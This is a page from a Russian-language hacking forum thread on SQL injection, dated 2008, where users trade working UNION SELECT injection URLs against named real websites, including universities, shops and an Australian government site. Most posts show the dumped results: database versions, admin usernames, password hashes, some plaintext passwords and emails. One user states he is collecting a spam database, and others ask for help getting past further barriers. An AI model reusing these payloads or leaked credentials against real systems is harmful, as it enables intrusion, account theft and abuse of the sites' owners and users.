ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу SQL Инъекции
   
 
Страница 693 из 1242 « Первая < 193593643683 689 690 691 692 693 694 695 696 697 7037437931193 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #6921  
Старый 23.11.2008, 22:25
satana8920
Moderator - Level 7
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187

Репутация: 369


Отправить сообщение для satana8920 с помощью ICQ
По умолчанию
Продолжаем тему edu =)
1й пошел =)
сайт: http://www.bme.gatech.edu
уязвимость:
Код HTML:
http://www.bme.gatech.edu/people/faculty_record.php?id=-1'+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
инфо:
Код:
 
Database Version: 4.1.22
Database name: faculty
User name: web@localhost


Сайт: https://its.kennesaw.edu/
Уязвимость:
Код HTML:
https://its.kennesaw.edu/cms/index.php?id=-1+Union+select+1,2,3,version(),5/*
Инфо:
Код:
 
Database Version: 4.0.17-standard-log
Database name: cms
User name: cms@localhost


Сайт:http://www.uhh.hawaii.edu/
Уязвимость:
Код HTML:
http://www.uhh.hawaii.edu/academics/hohonu/writing.php?id=-1+union+select+1,version(),3,4,5,6/*
Инфо:
Код:
 
Database Version: 4.1.22-log
Database name: hohonu
User name: hohonu@www.uhh.hawaii.edu


Сайт:http://dispatch.fandm.edu/
Уязвимость:
Код HTML:
http://dispatch.fandm.edu/category.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12/*
Инфо:
Код:
Database Version: 4.1.22-log
Database name: dispatch
User name: dispatch_reader@localhost
Еси кто расковыряет дальше то стучите самому лень так как 4я версия %)
Последний раз редактировалось satana8920; 23.11.2008 в 22:36..
 

  #6922  
Старый 24.11.2008, 00:14
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию
Код:
http://www.pro-xenon.ru/news.php?id=-1+union+select+1,concat(username,0x3a,user_password),3+FROM+phpbb_users+limit+1,1--
логин/пасс:
Код:
ProXenon.Ru:e25325d4885c130ab5b652109adef63f
------------------------------------------
Код:
http://nigatrade.biz/realty/zakaz.php?id=-1+union+select+1,2,3,4,concat(name,0x3a,pwd),6,7,8,9,10,11,12+FROM+admins--
логин/пасс:
Код:
rgk:686ff67efba121e906356233872afd2d
-------------------------------------------
Код:
http://katalog.motorky.com/moto.php?id=-150+union+select+1,2,concat(username,0x3a,user_password),4,5,6,7,8,9+FROM+phpbb_users+limit+1,1--
логин/пасс:
Код:
2 admin:bec47636b1594d444b88ec9eb4f15c7a
---------------------------------------------
Код:
http://yalta.org.ua/pages/person.php?id=-1+union+select+1,2,3,concat(nick,0x3a,password,0x3a,name,0x3a,email,0x3a,status),5,6,7,8,9,10,11,12,13,14+FROM+user_data--
логин/пасс/имя/мыло/работа/статус:
Код:
Alex:1010:Игорь Данилов:3ddd@yalta.org.ua:0
--------------------------------------------
Код:
http://www.express-bonus.ru/index.php?action=news&act=view&id=-1+union+select+1,concat(user_id,0x3a,username,0x3a%20,user_password,0x3a,user_email,0x3a,user_icq),3,4,%205,6+from+phpbb_users+limit+1,1/*
логин/пасс/мыло/ася/имя:
Код:
administrator:e04796528f705256f97a8c290bfd3070:kovalev@smartcard.ru
Код:
http://www.express-bonus.ru/index.php?action=news&act=view&id=-1+union+select+1,concat(user_id,0x3a,username,0x3a%20,user_password,0x3a,user_email,0x3a,user_icq),3,4,%205,6+from+phpbb_users+limit+1,600/*
Собираем спам-базу
--------------------------------------------
Код:
http://ron.the-underdogs.info/game.php?id=-135+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x3a,user,password),23,24,25,26,27,28,29,30,31,32,33,34,35+from+mysql.user/*
логин/пасс:
Код:
root:4bca6e21230d24de  flashback:4e62830249e37403
 ron:1b4fdeb00b833ac5  macgarden:4a5fe7e15ca085b0  Underdogs:4bca6e21230d24de  doggie:69288c4855bbb52a 
forum:3bd00f75423ddffd 
hotu:3213f1351227ad25  
community:4dfedf012cc6837d 
zzt:0e5829ac32cde319  
john_doe:70520cc9573c1cd3  phpAds:58efd1e0451c7a6c
-------------------------------------------------
Код:
http://www.kiirus.ee/php/index.php?lang=rus&id=-6+union+select+1,pass_admin,3,4,5,6+from+admin
Код:
http://www.kiirus.ee/php/index.php?lang=rus&id=-6+union+select+1,pass_admin,3,4,5,6+from+admin
логин/пасс:
Код:
Need4speed08:d2357411549940e64b552c99e78a1035
--------------------------------------------------
The End!
 

  #6923  
Старый 24.11.2008, 01:06
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию
http://www.marotori.com/news.php?id=2+union+select+1,2,3,4,5,6--

Довольно нехилое портфолио у них в общем понравилось мне там.

Database Version: 5.0.67-log
Database name: marotor_site
User name: marotor_dbuser@web0.marotori.net

In database marotor_apa_datafeed found table datafeed_authentication
0 : id
1 : auth_username
2 : auth_password
3 : auth_ip
4 : enable
5 : currency_id

[1]:11:approvedie:gogo123:91.186.19.1691.186.19.12990 .207.170.23983.136.71.11590.207.70.121:1:3
[2]:12:approveduk:gogo123:91.186.19.1691.186.19.12990 .207.170.23983.136.71.11577.44.50.42:1:1
[3]:13:telegraph:letmeinnow:91.186.19.1690.152.10.148 91.186.19.12981.157.123.20891.109.166.13591.186.19 .28:1:1
[4]:14:readersdigest:gogo123:91.186.19.1691.186.19.12 9:1:1
[5]:15:approvedgolf:gogo123:91.186.19.1691.186.19.129 :1:1
[6]:16:sandersonyoung:gogo123:91.186.19.1691.186.19.1 29:1:1

Я так понял пароли открыты но вот че то дальше не смог.
Может не там копался помогите...

Тут админка если че. http://www.marotori.com/admin/
 

  #6924  
Старый 24.11.2008, 19:34
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию
Может кто захочет доковырять до конца, мне лень

1) 4.1.11-Debian_4sarge2

http://www.drumshop.co.uk/product.php?id=99999/**/union/**/select/**/1,22,23,24,unhex(hex(version())),26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8,49,50,51,52--

2) 5.0.45-community-nt

http://www.streetendfeeds.co.uk/productdetails.php?id=789789789789%20UNION%20SELEC T%201,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23--
 

  #6925  
Старый 24.11.2008, 20:36
Ламоза
Новичок
Регистрация: 26.07.2008
Сообщений: 23
Провел на форуме:
414646

Репутация: 20
По умолчанию
Смотрим в заголовок 4.1.11-Debian_4sarge7
http://briefing.defenceandindustry.gov.au/category.php?id=-8+union+select+1,2,aes_decrypt(aes_encrypt(version (),0x71),0x71),4,5,6,7,8,9,10,11,12,13/*

Швейцарские горлопаны в австралии
http://www.swiss.org.au/member.php?ID=-20+union+select+1,2,3,4,5,version(),7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25/*
4.1.21-standard-log, таблица members есть, дальше не копал.
 

  #6926  
Старый 24.11.2008, 21:37
plutus
Новичок
Регистрация: 03.11.2008
Сообщений: 25
Провел на форуме:
34070

Репутация: 20
По умолчанию
http://hotelsaustri adirect.com/index.php?mod=re_search&ad=-7+union+select+1,2,3,4,concat(username,0x3e,passwo rd),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23+from+websiteadmin_admin_users--
 

  #6927  
Старый 24.11.2008, 21:41
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
Код:
http://ukrgazeta.plus.org.ua/article.php?ida=-594+union+select+1,2,3,4,5,6,7,8,9,10/*
user(): u_plus@localhost
database(): plus
version(): 4.1.22

//можете поздравить, у мну завтро днюхо!))
 

  #6928  
Старый 24.11.2008, 23:09
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию
http://www.fo-ra.ru/news.php?id=2 +union+select+1,version(),user(),database()--
5.0.67-log
u152033@10.10.223.228
u152033_fora

//faza02 с днюхой тебя хех,а у меня через 3 дня -)
 

Your One-Stop Shop For Everything Lovely
  #6929  
Старый 25.11.2008, 00:02
FNS
Новичок
Регистрация: 07.11.2008
Сообщений: 17
Провел на форуме:
51589

Репутация: 55
Отправить сообщение для FNS с помощью ICQ
По умолчанию Your One-Stop Shop For Everything Lovely
Код:
https://www.shoparooni.com/plushform/item.php?id=2/**/and/**/1=0/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/**/from/**/PHPAUCTIONXL_adminusers--
Цитата:
marlee:d89da8338e706977fc6c5902abac3ebe
Админки не нашел.
Последний раз редактировалось FNS; 25.11.2008 в 00:05..
 

  #6930  
Старый 25.11.2008, 00:35
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065

Репутация: 869
По умолчанию
Код:
http://www.indwesgear.com/item.php?id=-1%20UNION%20SELECT%201,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
Цитата:
5.0.38-Ubuntu_0ubuntu1.4-log:caps:root@localhost
 
 
Страница 693 из 1242 « Первая < 193593643683 689 690 691 692 693 694 695 696 697 7037437931193 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ